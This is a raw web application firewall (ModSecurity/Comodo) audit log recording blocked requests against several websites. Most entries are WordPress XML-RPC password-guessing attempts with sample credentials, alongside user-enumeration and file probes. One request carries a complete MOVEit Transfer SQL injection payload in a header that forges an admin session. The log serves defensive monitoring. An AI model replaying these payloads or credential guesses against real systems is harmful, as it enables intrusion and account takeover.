system.multicallmethodNamewp.getUsersBlogsparamssolehJarvis@2025 --7b856266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b856266-E-- --7b856266-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125680377303 6403 (- - -) Stopwatch2: 1749125680377303 6403; combined=4452, p1=551, p2=3688, p3=0, p4=0, p5=138, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b856266-Z-- --8f61175d-A-- [05/Jun/2025:19:19:57 +0700] aEGLbeth7G2xELALzPZe9gAAANE 103.236.140.4 32970 103.236.140.4 8181 --8f61175d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8f61175d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin@123321 --8f61175d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f61175d-E-- --8f61175d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125997242858 7599 (- - -) Stopwatch2: 1749125997242858 7599; combined=4733, p1=652, p2=3901, p3=0, p4=0, p5=107, sr=113, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f61175d-Z-- --d3de4b3c-A-- [05/Jun/2025:19:20:01 +0700] aEGLcVwdJdhOudw5hdz_-QAAAIQ 103.236.140.4 32972 103.236.140.4 8181 --d3de4b3c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.81.182.244 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.81.182.244 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d3de4b3c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin@123321 --d3de4b3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3de4b3c-E-- --d3de4b3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.81.182.244 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126001444401 6397 (- - -) Stopwatch2: 1749126001444401 6397; combined=4444, p1=542, p2=3731, p3=0, p4=0, p5=102, sr=92, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3de4b3c-Z-- --0d41442e-A-- [05/Jun/2025:19:20:52 +0700] aEGLpFwdJdhOudw5hdz_-gAAAJY 103.236.140.4 32980 103.236.140.4 8181 --0d41442e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.161 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0d41442e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehDeveloper@321 --0d41442e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d41442e-E-- --0d41442e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.161 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126052618330 5380 (- - -) Stopwatch2: 1749126052618330 5380; combined=3819, p1=436, p2=3206, p3=0, p4=0, p5=107, sr=74, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d41442e-Z-- --f0771d7f-A-- [05/Jun/2025:19:25:08 +0700] aEGMpFwdJdhOudw5hdwACgAAAIA 103.236.140.4 33040 103.236.140.4 8181 --f0771d7f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 192.169.190.104 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 192.169.190.104 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f0771d7f-C-- system.multicallmethodNamewp.getUsersBlogsparamsmarinMarin2016! --f0771d7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0771d7f-E-- --f0771d7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 192.169.190.104 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126308884312 4764 (- - -) Stopwatch2: 1749126308884312 4764; combined=3634, p1=389, p2=3083, p3=0, p4=0, p5=95, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0771d7f-Z-- --44051974-A-- [05/Jun/2025:19:27:44 +0700] aEGNQOth7G2xELALzPZfAgAAAMQ 103.236.140.4 33110 103.236.140.4 8181 --44051974-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 498 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --44051974-C-- system.multicallmethodNamewp.getUsersBlogsparamsbeheertweekshopbeheerantixshop --44051974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44051974-E-- --44051974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126464094858 7508 (- - -) Stopwatch2: 1749126464094858 7508; combined=4738, p1=650, p2=3889, p3=0, p4=0, p5=124, sr=119, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44051974-Z-- --39a6a838-A-- [05/Jun/2025:19:28:22 +0700] aEGNZuth7G2xELALzPZfBAAAAMg 103.236.140.4 33132 103.236.140.4 8181 --39a6a838-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.161 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --39a6a838-C-- system.multicallmethodNamewp.getUsersBlogsparamssoleh22soleh22 --39a6a838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a6a838-E-- --39a6a838-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.161 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126502239734 6619 (- - -) Stopwatch2: 1749126502239734 6619; combined=4532, p1=588, p2=3753, p3=0, p4=0, p5=112, sr=97, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a6a838-Z-- --f4ae786b-A-- [05/Jun/2025:19:31:22 +0700] aEGOGuth7G2xELALzPZfCAAAAMY 103.236.140.4 33160 103.236.140.4 8181 --f4ae786b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f4ae786b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2024! --f4ae786b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4ae786b-E-- --f4ae786b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126682799372 5766 (- - -) Stopwatch2: 1749126682799372 5766; combined=4178, p1=472, p2=3534, p3=0, p4=0, p5=101, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4ae786b-Z-- --88e0d014-A-- [05/Jun/2025:19:31:51 +0700] aEGON1wdJdhOudw5hdwAIQAAAIs 103.236.140.4 33168 103.236.140.4 8181 --88e0d014-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.161 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --88e0d014-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@24 --88e0d014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e0d014-E-- --88e0d014-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.161 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126711852252 5689 (- - -) Stopwatch2: 1749126711852252 5689; combined=4125, p1=470, p2=3483, p3=0, p4=0, p5=101, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88e0d014-Z-- --fbcc994e-A-- [05/Jun/2025:19:35:31 +0700] aEGPE1wdJdhOudw5hdwALQAAAJQ 103.236.140.4 33280 103.236.140.4 8181 --fbcc994e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.81.182.244 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.81.182.244 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fbcc994e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin.. --fbcc994e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbcc994e-E-- --fbcc994e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.81.182.244 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749126931316036 4846 (- - -) Stopwatch2: 1749126931316036 4846; combined=3780, p1=407, p2=3215, p3=0, p4=0, p5=93, sr=82, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbcc994e-Z-- --7a15ef3f-A-- [05/Jun/2025:19:37:49 +0700] aEGPneth7G2xELALzPZfKwAAAMQ 103.236.140.4 33316 103.236.140.4 8181 --7a15ef3f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7a15ef3f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminRahul@123 --7a15ef3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a15ef3f-E-- --7a15ef3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 208.109.32.135 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749127069186956 5264 (- - -) Stopwatch2: 1749127069186956 5264; combined=3894, p1=482, p2=3239, p3=0, p4=0, p5=101, sr=125, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a15ef3f-Z-- --5a482753-A-- [05/Jun/2025:19:42:31 +0700] aEGQtyrHpfaS2Cuwh8UL3AAAAE8 103.236.140.4 33388 103.236.140.4 8181 --5a482753-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a482753-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminqwer1234 --5a482753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a482753-E-- --5a482753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749127351900607 5516 (- - -) Stopwatch2: 1749127351900607 5516; combined=4011, p1=464, p2=3383, p3=0, p4=0, p5=97, sr=82, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a482753-Z-- --61a64f7c-A-- [05/Jun/2025:19:55:50 +0700] aEGT1uth7G2xELALzPZfUwAAAMg 103.236.140.4 33482 103.236.140.4 8181 --61a64f7c-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173975562 --61a64f7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --61a64f7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749128150051275 1846 (- - -) Stopwatch2: 1749128150051275 1846; combined=725, p1=349, p2=348, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61a64f7c-Z-- --a614c752-A-- [05/Jun/2025:20:00:22 +0700] aEGU5lwdJdhOudw5hdwAVAAAAIk 103.236.140.4 33560 103.236.140.4 8181 --a614c752-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: siLockLongTermInstID=0; SenayanMember=hs0u2nqv0endo5qrqk5foqgo2t X-Varnish: 173975576 --a614c752-C-- --a614c752-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a614c752-E-- --a614c752-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749128422051866 3206 (- - -) Stopwatch2: 1749128422051866 3206; combined=1624, p1=502, p2=1096, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a614c752-Z-- --83f1c159-A-- [05/Jun/2025:20:00:27 +0700] aEGU61wdJdhOudw5hdwAVgAAAI4 103.236.140.4 33570 103.236.140.4 8181 --83f1c159-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xxRNEzNwXI0bzeiwv5DSRNFYJz');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET IpAddress='206.82.6.62' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xxRNEzNwXI0bzeiwv5DSRNFYJz'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 206.82.6.62 Cookie: siLockLongTermInstID=0; SenayanMember=hs0u2nqv0endo5qrqk5foqgo2t X-Varnish: 173975579 --83f1c159-C-- --83f1c159-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83f1c159-E-- --83f1c159-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749128427032897 2886 (- - -) Stopwatch2: 1749128427032897 2886; combined=1453, p1=424, p2=1000, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83f1c159-Z-- --632b4d0a-A-- [05/Jun/2025:20:14:17 +0700] aEGYKeth7G2xELALzPZffQAAAMM 103.236.140.4 33814 103.236.140.4 8181 --632b4d0a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.59.17.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --632b4d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 